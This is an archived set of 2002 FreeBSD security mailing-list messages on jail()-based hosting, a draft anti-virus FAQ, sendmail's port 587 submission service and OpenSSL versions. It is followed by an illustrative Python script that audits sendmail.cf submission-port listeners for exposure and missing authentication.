Received: from web12803.mail.yahoo.com (web12803.mail.yahoo.com [216.136.174.38]) by mx1.FreeBSD.org (Postfix) with SMTP id 9511F43E4A for ; Fri, 6 Sep 2002 11:58:14 -0700 (PDT) (envelope-from zaunere@yahoo.com)
Message-ID: <20020906185814.71834.qmail@web12803.mail.yahoo.com>
Received: from [128.122.155.151] by web12803.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 11:58:14 PDT
Date: Fri, 6 Sep 2002 11:58:14 -0700 (PDT)
From: Hans Zaunere
Subject: jail() House Rock
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I'm looking to provide jail()'d root access to clients (the virtual private server bit).
I myself have been a client on several of these setups, and while some are better than others, I often find missing and broken features - and I've never even looked at it from a security standpoint.

Aside from the commonly known man pages/handbooks/etc is there a definitive source for PROPERLY setting one of these systems up? Something that outlines what features mean decreased security? Something that outlines proper layout of these systems? Then I can judge exactly what and what not to offer. I already have a good handle on security of regular systems, so something specific to the jail()'d environment would be best, as I'm sure there are some gotchas and such.

Thank you,

Hans

From owner-freebsd-security Fri Sep 6 12:46:58 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D2E7537B4DC for ; Fri, 6 Sep 2002 12:46:37 -0700 (PDT)
Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by mx1.FreeBSD.org (Postfix) with SMTP id CE8E743E77 for ; Fri, 6 Sep 2002 12:46:36 -0700 (PDT) (envelope-from jps@funeralexchange.com)
Received: (qmail 993 invoked by uid 85); 6 Sep 2002 19:59:56 -0000
Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. Processed in 0.171496 secs); 06 Sep 2002 19:59:56 -0000
Received: from unknown (HELO pimpin) (216.138.114.143) by mail.allneo.com with SMTP; 6 Sep 2002 19:59:55 -0000
Reply-To:
From: "Jeremy Suo-Anttila"
To: "twig les" , "Lawrence Sica" ,
Cc:
Subject: RE: Fwd: Anti-virus section for FAQ
Date: Fri, 6 Sep 2002 14:52:43 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Importance: Normal
In-Reply-To: <20020906184948.4405.qmail@web10101.mail.yahoo.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

There is no mention of the qmail-scanner package that is available for qmail based servers. Might want to add that also qmail-scanner.sourceforge.net

Thanks

Jeremy Suo-Anttila
jps@funeralexchange.com

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of twig les
Sent: Friday, September 06, 2002 1:50 PM
To: Lawrence Sica; freebsd-security@FreeBSD.ORG
Cc: freebsd-doc@freebsd.org
Subject: Re: Fwd: Anti-virus section for FAQ

I like it. Documentation that is short, to the point and works.

--- Lawrence Sica wrote:
> Oops, helps if I post the url eh ;)
>
> http://www.thesicafamily.org/larry/articles/avfaq.html
>
> Sorry about that.
>
> Begin forwarded message:
>
> > From: Lawrence Sica
> > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern
> > To:
> > Cc: freebsd-doc@freebsd.org
> > Subject: Anti-virus section for FAQ
> >
> > I have put together a quick FAQ section on FreeBSD
> AV software and
> > interface. Let me know what all of you think. If
> you have any
> > additions please let me know. Same with
> comments/suggestions.
> >
> > If all is well I'll mark it up for the FAQ, I'd
> love to get it added
> > to the official FAQ if possible. Be gentle it's
> my first time ;)
> >
> >
> > TIA,
> >
> > Larry
> >
>

=====
-----------------------------------------------------------
Heavy metal made me do it.
-----------------------------------------------------------

From owner-freebsd-security Fri Sep 6 13:47:13 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8E20E37B400 for ; Fri, 6 Sep 2002 13:47:06 -0700 (PDT)
Received: from www.cotse.net (www.cotse.net [216.112.42.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5B7D143E3B for ; Fri, 6 Sep 2002 13:47:05 -0700 (PDT) (envelope-from john@cotse.com)
Received: from www.cotse.net (www.cotse.net[216.112.42.60]) (authenticated bits=0) by www.cotse.net (8.12.5/8.12.5) with ESMTP id g86KrlSr079070; Fri, 6 Sep 2002 16:53:49 -0400 (EDT) (envelope-from john@cotse.com)
Message-Id: <5.1.0.14.2.20020906164529.03768560@pop.cotse.com>
X-Sender: johnh@pop.cotse.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Fri, 06 Sep 2002 16:46:38 -0400
To: Lawrence Sica
From: John Holstein
Subject: Re: Fwd: Anti-virus section for FAQ
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

nice. would be good to see the actual URL in the page, rather than a simple link, for printing purposes....

just my .02c

John Holstein

At 02:23 PM 9/6/2002 -0400, you wrote:
>Oops, helps if I post the url eh ;)
>
>http://www.thesicafamily.org/larry/articles/avfaq.html
>
>Sorry about that.
>
>Begin forwarded message:
>
>>From: Lawrence Sica
>>Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern
>>To:
>>Cc: freebsd-doc@freebsd.org
>>Subject: Anti-virus section for FAQ
>>
>>I have put together a quick FAQ section on FreeBSD AV software and
>>interface. Let me know what all of you think. If you have any additions
>>please let me know. Same with comments/suggestions.
>>
>>If all is well I'll mark it up for the FAQ, I'd love to get it added to
>>the official FAQ if possible. Be gentle it's my first time ;)
>>
>>
>>TIA,
>>
>>Larry
>
>

From owner-freebsd-security Fri Sep 6 15:16:25 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6FE4337B400 for ; Fri, 6 Sep 2002 15:16:19 -0700 (PDT)
Received: from web12805.mail.yahoo.com (web12805.mail.yahoo.com [216.136.174.40]) by mx1.FreeBSD.org (Postfix) with SMTP id 203F943E65 for ; Fri, 6 Sep 2002 15:16:19 -0700 (PDT) (envelope-from zaunere@yahoo.com)
Message-ID: <20020906221618.98815.qmail@web12805.mail.yahoo.com>
Received: from [66.114.70.134] by web12805.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 15:16:18 PDT
Date: Fri, 6 Sep 2002 15:16:18 -0700 (PDT)
From: Hans Zaunere
Subject: Re: jail() House Rock
To: Travis Stevenson
Cc: freebsd-security@freebsd.org
In-Reply-To: <20020906211112.D6190492644@hermes.maverik.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Does this occur only within the jail or outside as well?

Thanks,

Hans

--- Travis Stevenson wrote:
> The problems I have seen is some wackiness with syslogd and
> I have trouble using ^C to cancel some interactive
> programs. I have to ^Z and then a kill. When syslogd does
> a rotation It stops logging to /var/log/messages.
> Sometimes a kill of syslogd and restarting the programs
> that log to it helps. Other times I have to restart jail.
>
> --Travis
>
> Hans Zaunere said:
>
> >
> > I'm looking to provide jail()'d root access to clients
> (the virtual
> > private server bit). I myself have been a client on
> several of these
> > setups, and while some are better than others, I often
> find missing and
> > broken features - and I've never even looked at it from a
> security
> > standpoint.
> >
> > Aside from the commonly known man pages/handbooks/etc is
> there a
> > definitive source for PROPERLY setting one of these
> systems up?
> > Something that outlines what features mean decreased
> security?
> > Something that outlines proper layout of these systems?
> Then I can
> > judge exactly what and what not to offer. I already have
> a good handle
> > on security of regular systems, so something specific to
> the jail()'d
> > environment would be best, as I'm sure there are some
> gotchas and such.
> >
> > Thank you,
> >
> > Hans
> >
> >
> --
>

From owner-freebsd-security Fri Sep 6 15:23:23 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8E4737B405 for ; Fri, 6 Sep 2002 15:23:12 -0700 (PDT)
Received: from unix.megared.net.mx (megamail.megared.com.mx [200.52.207.52]) by mx1.FreeBSD.org (Postfix) with ESMTP id AE47C43E72 for ; Fri, 6 Sep 2002 15:23:11 -0700 (PDT) (envelope-from jose.esteban@plazanetwork.com)
Received: from bebo ([10.38.93.177]) by unix.megared.net.mx (8.11.6/8.11.6) with ESMTP id g86MNsq61847 for ; Fri, 6 Sep 2002 17:23:54 -0500 (CDT) (envelope-from jose.esteban@plazanetwork.com)
From: "Jose Esteban Esquer Biskofski"
To:
Subject: asmtp 587
Date: Fri, 6 Sep 2002 17:23:57 -0500
Message-ID: <000001c255f4$179c0fc0$0800a8c0@bebo>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
In-Reply-To: <20020906221618.98815.qmail@web12805.mail.yahoo.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hello, I've been looking for information on what sendmail's asmtp (port 587) is exactly, and how to close it. I've had no luck, could someone please tell me how to get rid of it? Thanks.
Jose Esteban Esquer Biskofski
PlazaNetwork.Net

From owner-freebsd-security Fri Sep 6 15:29:39 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CB6DE37B400 for ; Fri, 6 Sep 2002 15:29:35 -0700 (PDT)
Received: from orthanc.ab.ca (orthanc.ab.ca [216.123.203.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C5B643E3B for ; Fri, 6 Sep 2002 15:29:35 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca)
Received: from orthanc.ab.ca (localhost.orthanc.ab.ca [127.0.0.1]) by orthanc.ab.ca (8.12.5/8.12.5) with ESMTP id g86MTX3j042290; Fri, 6 Sep 2002 16:29:33 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca)
Message-Id: <200209062229.g86MTX3j042290@orthanc.ab.ca>
From: Lyndon Nerenberg
Organization: The Frobozz Magic Homing Pigeon Company
To: "Jose Esteban Esquer Biskofski"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: asmtp 587
In-reply-to: Your message of "Fri, 06 Sep 2002 17:23:57 CDT." <000001c255f4$179c0fc0$0800a8c0@bebo>
X-Mailer: mh-e 6.1+cvs; MH 6.8.4; Emacs 21.2
Date: Fri, 06 Sep 2002 16:29:33 -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

>>>>> "Jose" == Jose Esteban Esquer Biskofski writes:

Jose> Hello, I've been looking for information on what sendmail's
Jose> asmtp (port 587) is exactly, and how to close it. I've had no
Jose> luck, could someone please tell me how to get rid of it?
Jose> Thanks.

Port 587 is the Mail Submission service (RFC 2476), and instead of turning it off you should learn what it's for and then configure your MUAs to use it.
--lyndon

From owner-freebsd-security Fri Sep 6 16: 7:44 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D36B837B400 for ; Fri, 6 Sep 2002 16:07:39 -0700 (PDT)
Received: from web12808.mail.yahoo.com (web12808.mail.yahoo.com [216.136.174.43]) by mx1.FreeBSD.org (Postfix) with SMTP id 5F10343E91 for ; Fri, 6 Sep 2002 16:07:23 -0700 (PDT) (envelope-from zaunere@yahoo.com)
Message-ID: <20020906230716.99501.qmail@web12808.mail.yahoo.com>
Received: from [66.114.70.134] by web12808.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 16:07:16 PDT
Date: Fri, 6 Sep 2002 16:07:16 -0700 (PDT)
From: Hans Zaunere
Subject: Re: asmtp 587
To: Lyndon Nerenberg , Jose Esteban Esquer Biskofski
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <200209062229.g86MTX3j042290@orthanc.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

--- Lyndon Nerenberg wrote:
> >>>>> "Jose" == Jose Esteban Esquer Biskofski
> writes:
>
> Jose> Hello, I've been looking for information on what sendmail's
> Jose> asmtp (port 587) is exactly, and how to close it. I've had
> no
> Jose> luck, could someone please tell me how to get rid of it?
> Jose> Thanks.
>
> Port 587 is the Mail Submission service (RFC 2476), and instead of
> turning it off you should learn what it's for and then configure
> your MUAs to use it.

I disagree. I've been through docs/RFCs/etc and I have yet to see its purpose. As far as I can tell, it's just sendmail listening on another port. The pertinent line in /etc/mail/sendmail.cf:

O DaemonPortOptions=Port=587, Name=MSA, M=E

and I've commented it out.
If someone can tell me how I'm supposed to talk to it, I'd be interested - otherwise I see it just as an immature default. And, if it's set up for MUAs, why does it listen on all IPs? Just localhost, no?

Thanks,

Hans

>
> --lyndon
>

From owner-freebsd-security Fri Sep 6 17:39:51 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E939A37B400; Fri, 6 Sep 2002 17:39:39 -0700 (PDT)
Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C3EA43E3B; Fri, 6 Sep 2002 17:39:39 -0700 (PDT) (envelope-from lomifeh@earthlink.net)
Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout05.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H210086OLU2H0@mtaout05.icomcast.net>; Fri, 06 Sep 2002 20:39:38 -0400 (EDT)
Date: Fri, 06 Sep 2002 20:39:38 -0400
From: Lawrence Sica
Subject: Re: Anti-virus section for FAQ
In-reply-to: <20020906223033.69179.qmail@web14601.mail.yahoo.com>
To: Jerry Murdock
Cc: freebsd-security@FreeBSD.ORG, freebsd-doc@freebsd.org
Message-id: <4A393ABF-C1FA-11D6-9989-000393A335A2@earthlink.net>
MIME-version: 1.0
X-Mailer: Apple Mail (2.543)
Content-type: text/plain; charset=US-ASCII; format=flowed
Content-transfer-encoding: 7BIT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Friday, September 6, 2002, at 06:30
PM, Jerry Murdock wrote:

> ----- Original Message -----
> From: "Lawrence Sica"
> To:
> Cc:
> Sent: Friday, September 06, 2002 2:23 PM
> Subject: Fwd: Anti-virus section for FAQ
>
>> Oops, helps if I post the url eh ;)
>>
>> http://www.thesicafamily.org/larry/articles/avfaq.html
>>
>> Sorry about that.
>>
>
> I'd add a disclaimer to check licensing on the scanners. Some are
> free for
> personal use, none are free for commercial use. Some like McAfee will
> require
> a license for each mailbox, others are per-server, others per-domain.
>
> F-Prot (www.f-prot.com) certainly needs to be mentioned. It's better
> than most,
> is free for personal use, and has reasonable "per server" pricing for
> commercial use.
>

I thought I had this in there, must have fallen off my list. Thanks.

> Trend VirusWall (www.antivirus.com) should be mentioned under both
> http and
> mail scanner sections. It's linux, but is rock solid under FBSD
> emulation.
> It's only really viable http option IMO.
>

Ok, good to know

> http://www.pcxperience.org/dgvirus/ should probably be mentioned under
> the http
> section. It's a dansguardian customization that is the most promising
> open
> source http scanner I've seen. Still young though, and I haven't
> tested on
> freebsd.
>
> http://viralator.loddington.com/ probably needs a mention under http
> section as
> well.
>
> http://www.openantivirus.org needs mentioning in all sections.
> Nothing there
> is production quality IMO, but the exposure can only help.
>

I'll check these out. thanks.
--Larry

From owner-freebsd-security Sat Sep 7 20:28:55 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE45537B400 for ; Sat, 7 Sep 2002 20:28:51 -0700 (PDT)
Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id C039843E3B for ; Sat, 7 Sep 2002 20:28:50 -0700 (PDT) (envelope-from freebsd@babayaga.neotext.ca)
Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.5/8.12.5) with ESMTP id g883UHNM000522 for ; Sat, 7 Sep 2002 21:30:17 -0600 (MDT) (envelope-from freebsd@babayaga.neotext.ca)
From: "Duncan Patton a Campbell is Dhu"
To: freebsd-security@FreeBSD.ORG
Subject: OpenSSL (agin)
Date: Sat, 7 Sep 2002 21:30:17 -0600
Message-Id: <20020908033017.M92241@babayaga.neotext.ca>
In-Reply-To: <200209062229.g86MTX3j042290@orthanc.ab.ca>
References: Your message of "Fri, 06 Sep 2002 17:23:57 CDT." <000001c255f4$179c0fc0$0800a8c0@bebo> <200209062229.g86MTX3j042290@orthanc.ab.ca>
X-Mailer: Open WebMail 1.70 20020712
X-OriginatingIP: 127.0.0.1 (freebsd)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I just installed a system from the net using 4.6.2-RELEASE floppies and it installed openssl 9.6e, not g.
Duncan Patton a Campbell is Duihb

From owner-freebsd-security Sat Sep 7 22:21: 2 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4145E37B400 for ; Sat, 7 Sep 2002 22:20:59 -0700 (PDT)
Received: from seven.Alameda.net (seven.Alameda.net [64.81.63.137]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF51343E4A for ; Sat, 7 Sep 2002 22:20:58 -0700 (PDT) (envelope-from ulf@Alameda.net)
Received: by seven.Alameda.net (Postfix, from userid 1000) id 67BAE3A204; Sat, 7 Sep 2002 22:20:58 -0700 (PDT)
Date: Sat, 7 Sep 2002 22:20:58 -0700
From: Ulf Zimmermann
To: Duncan Patton a Campbell is Dhu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSL (agin)
Message-ID: <20020907222058.C65100@seven.alameda.net>
Reply-To: ulf@Alameda.net
References: <000001c255f4$179c0fc0$0800a8c0@bebo> <200209062229.g86MTX3j042290@orthanc.ab.ca> <20020908033017.M92241@babayaga.neotext.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020908033017.M92241@babayaga.neotext.ca>; from freebsd@babayaga.neotext.ca on Sat, Sep 07, 2002 at 09:30:17PM -0600
Organization: Alameda Networks, Inc.
X-Operating-System: FreeBSD 4.7-PRERELEASE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Sep 07, 2002 at 09:30:17PM -0600, Duncan Patton a Campbell is Dhu wrote:
> I just installed a system from the net using 4.6.2-RELEASE
> floppies and it installed openssl 9.6e, not g.
>
> Duncan Patton a Campbell is Duihb

0.9.6g was released after 4.6.2-RELEASE was done AFAIK.
From the 4.6.2-RELEASE notes:

http://www.freebsd.org/releases/4.6.2R/relnotes-i386.html

[4.6.2] OpenSSL has been updated to 0.9.6e.

4-STABLE (ie 4.7-PRERELEASE) has 0.9.6g now.

--
Regards, Ulf.

---------------------------------------------------------------------
Ulf Zimmermann, 1525 Pacific Ave., Alameda, CA-94501, #: 510-865-0204
You can find my resume at: http://seven.Alameda.net/~ulf/resume.html
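
For the "asmtp 587" exchange earlier in this archive, an added example (not code from any poster or from sendmail itself): a Python check that reads sendmail.cf text, lists the active DaemonPortOptions listeners, and reports whether the submission port is bound to every address and whether it requires AUTH. The function names and sample configurations are constructed around the line quoted in the thread; treating a missing Addr= as all addresses, a missing Port= as smtp, field names as identified by their first letter, and modifier a as "require authentication" are assumptions of this example.

```python
import re

# Matches active option lines only; a commented-out "#O ..." line does not match.
OPTION_RE = re.compile(r"^O\s+DaemonPortOptions\s*=\s*(.*)$")

SUBMISSION_PORTS = {"587", "submission"}
LOOPBACK_ADDRS = {"127.0.0.1", "localhost"}


def parse_listeners(cf_text):
    """Return one dict per active 'O DaemonPortOptions=' line in sendmail.cf text."""
    listeners = []
    for lineno, raw in enumerate(cf_text.splitlines(), start=1):
        match = OPTION_RE.match(raw.rstrip())
        if not match:
            continue
        fields = {}
        for item in match.group(1).split(","):
            key, sep, value = item.strip().partition("=")
            if sep:
                # Assumption: field names are identified by their first letter,
                # so "M=E" and "Modifiers=E" land in the same slot.
                fields[key[:1].upper()] = value.strip()
        listeners.append({
            "line": lineno,
            "name": fields.get("N", ""),
            "port": fields.get("P", "smtp"),   # assumption: no Port= means smtp (25)
            "addr": fields.get("A"),           # assumption: no Addr= means all addresses
            "modifiers": fields.get("M", ""),
        })
    return listeners


def audit_submission(listeners):
    """Return (line, level, message) findings for submission-port listeners."""
    findings = []
    for lst in listeners:
        if lst["port"].lower() not in SUBMISSION_PORTS:
            continue
        local_only = lst["addr"] in LOOPBACK_ADDRS
        if lst["addr"] is None:
            findings.append((lst["line"], "info", "listens on all addresses (no Addr=)"))
        # Assumption: modifier 'a' makes the daemon require SMTP AUTH.
        if not local_only and "a" not in lst["modifiers"]:
            findings.append((lst["line"], "warn", "reachable off-host without modifier 'a'"))
    return findings


# Constructed samples. STOCK_CF uses the MSA line quoted in the thread.
STOCK_CF = """\
# constructed excerpt of /etc/mail/sendmail.cf
O DaemonPortOptions=Name=MTA
O DaemonPortOptions=Port=587, Name=MSA, M=E
"""
COMMENTED_CF = STOCK_CF.replace("O DaemonPortOptions=Port=587", "#O DaemonPortOptions=Port=587")
LOOPBACK_CF = STOCK_CF.replace("Port=587,", "Port=587, Addr=127.0.0.1,")
AUTH_CF = STOCK_CF.replace("M=E", "M=Ea")

if __name__ == "__main__":
    for label, cf in [("stock", STOCK_CF), ("commented out", COMMENTED_CF),
                      ("loopback only", LOOPBACK_CF), ("AUTH required", AUTH_CF)]:
        print(label)
        for listener in parse_listeners(cf):
            print("  listener:", listener)
        for finding in audit_submission(parse_listeners(cf)):
            print("  finding:", finding)
```

The four samples cover the positions taken in the thread: the stock line, the line commented out, a loopback-only binding, and a listener left on all addresses but requiring authentication.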